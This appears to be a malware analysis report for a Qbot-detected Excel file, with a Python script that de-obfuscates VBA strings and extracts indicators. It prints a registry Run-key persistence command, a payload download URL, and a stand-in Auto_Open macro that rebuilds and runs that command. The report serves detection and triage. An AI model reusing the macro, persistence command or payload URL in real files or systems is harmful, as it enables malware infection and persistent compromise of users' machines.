Qbot — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 947d908312d65b95…

MALICIOUS

Office (OLE) / .XLS

Size: 534.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
MD5: aa6fb794bbba6766a1cfb2474dfc3729
SHA-1: f04842c9758b6e8e00108bf935292e03ecb923dd
SHA-256: 947d908312d65b95f5bc8edde456ac108a3961f14bbfac807e6bed587c7e03ec
Risk score: 160

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The critical ClamAV detection, the high-severity OLE_VBA_AUTO and OLE_VBA_AUTOCLOSE heuristics (Auto_Open and Auto_Close entry points, so the code runs when the workbook is opened or closed once macros are enabled) and the medium-severity OLE_VBA_MACROS heuristic together indicate a malicious macro-enabled Excel file. The VBA contains obfuscated strings that reconstruct to a registry command for persistence and a URL for a second-stage payload. Specifically, they rebuild 'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v IAccessible2Proxy /t REG_SZ /d "C:\Users\Public\Libraries\System.exe" /f', which registers C:\Users\Public\Libraries\System.exe (a user-writable path) to start at every logon of the current user, and the download URL 'http://185.173.170.136/payload.exe'. A downloader macro combined with Run-key persistence is characteristic of Qbot.
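The string reconstruction and auto-exec triage described above, as an added example: this is not the analysis pipeline's code and not the sample's own macro. The VBA embedded below is a constructed stand-in whose Chr()/literal fragments fold back to the REG ADD command and URL listed in this report; the obfuscation scheme of the real macros.bas is not shown on the page and is assumed. The script folds each string assignment, checks for the Auto_Open/Auto_Close entry points the heuristics flag, and pulls the persistence key and download URL out of the folded values.

```python
"""Triage a decoded VBA module: fold Chr()/literal concatenations, find
auto-exec entry points, extract Run-key persistence and URLs.
Added example; not the report's pipeline and not the sample's macro."""
import re

# Constructed stand-in for macros.bas. The fragments rebuild to the command and
# URL the report lists; the real sample's obfuscation scheme is assumed.
SAMPLE_VBA = r'''
Attribute VB_Name = "Module1"
Sub Auto_Open()
    Dim k As String, u As String
    k = Chr(82) & Chr(69) & Chr(71) & " ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
    k = k & " /v " & "IAcc" & "essible2" & "Proxy" & " /t REG_SZ /d " & Chr(34) & "C:\Users\Public\Libraries\System.exe" & Chr(34) & " /f"
    u = "ht" & "tp://" & "185.173" & ".170.136" & "/pay" & "load.exe"
    Shell k, vbHide
End Sub
Sub Auto_Close()
    ' cleanup stub
End Sub
'''

# One assignment per line: name = expr
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# Concatenation operands: Chr(n), "literal", or a previously assigned variable
TOKEN = re.compile(r'Chr\((\d+)\)|"([^"]*)"|([A-Za-z_]\w*)')
# Auto-exec procedure names olevba treats as triggers (Auto_Open/Auto_Close are the ones flagged here)
AUTOEXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+'
    r'(Auto_Open|Auto_Close|Workbook_Open|Workbook_BeforeClose|Document_Open|AutoOpen)\b',
    re.IGNORECASE | re.MULTILINE)
URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
RUN_KEY = re.compile(
    r'REG\s+ADD\s+(HK\w+\\[^\s]*\\Run)\s+/v\s+(\S+)\s+/t\s+\S+\s+/d\s+"?([^"]+)"?',
    re.IGNORECASE)


def deobfuscate(vba: str) -> dict:
    """Fold string assignments line by line; later lines may reference earlier
    variables (k = k & ...). Returns the final value of every variable."""
    env = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.group(1), m.group(2)
        parts = []
        for t in TOKEN.finditer(expr):
            if t.lastindex == 1:          # Chr(n)
                parts.append(chr(int(t.group(1))))
            elif t.lastindex == 2:        # "literal" (may be empty)
                parts.append(t.group(2))
            else:                         # variable reference, unknown -> ""
                parts.append(env.get(t.group(3), ""))
        env[name] = "".join(parts)
    return env


def autoexec_entry_points(vba: str) -> list:
    """Procedure names that run without a user calling them."""
    return AUTOEXEC.findall(vba)


def extract_iocs(values) -> dict:
    """URLs and HKxx\\...\\Run persistence entries from folded strings."""
    iocs = {"urls": [], "run_keys": []}
    for v in values:
        iocs["urls"].extend(URL.findall(v))
        for key, name, data in RUN_KEY.findall(v):
            iocs["run_keys"].append({"key": key, "value": name, "data": data})
    return iocs


def triage(vba: str) -> dict:
    """Flag when an auto-exec entry point coexists with a URL or Run-key write."""
    env = deobfuscate(vba)
    entry = autoexec_entry_points(vba)
    iocs = extract_iocs(env.values())
    flagged = bool(entry) and bool(iocs["urls"] or iocs["run_keys"])
    return {"autoexec": entry, "strings": env, "iocs": iocs, "flagged": flagged}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("auto-exec:", result["autoexec"])
    for name, value in result["strings"].items():
        print(f"{name} = {value}")
    print("IOCs:", result["iocs"])
    print("flagged:", result["flagged"])
```

The folding step is deliberately a line-by-line interpreter rather than an `eval`: a malicious module may build strings across many assignments, and tracking the environment reproduces that without executing any VBA. The same pass can be pointed at the real macros.bas once olevba has dumped it, but any operator beyond Chr(), literals and variables (StrReverse, Mid, arithmetic on codes) needs its own case.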

Heuristics (4)

  • ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Macro procedure that runs automatically when the workbook is opened
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Macro procedure that runs automatically when the workbook is closed
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 6e975c057e590861c6128ab401ae21bf378c17c629fd38de134b190793c442d7
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3465 bytes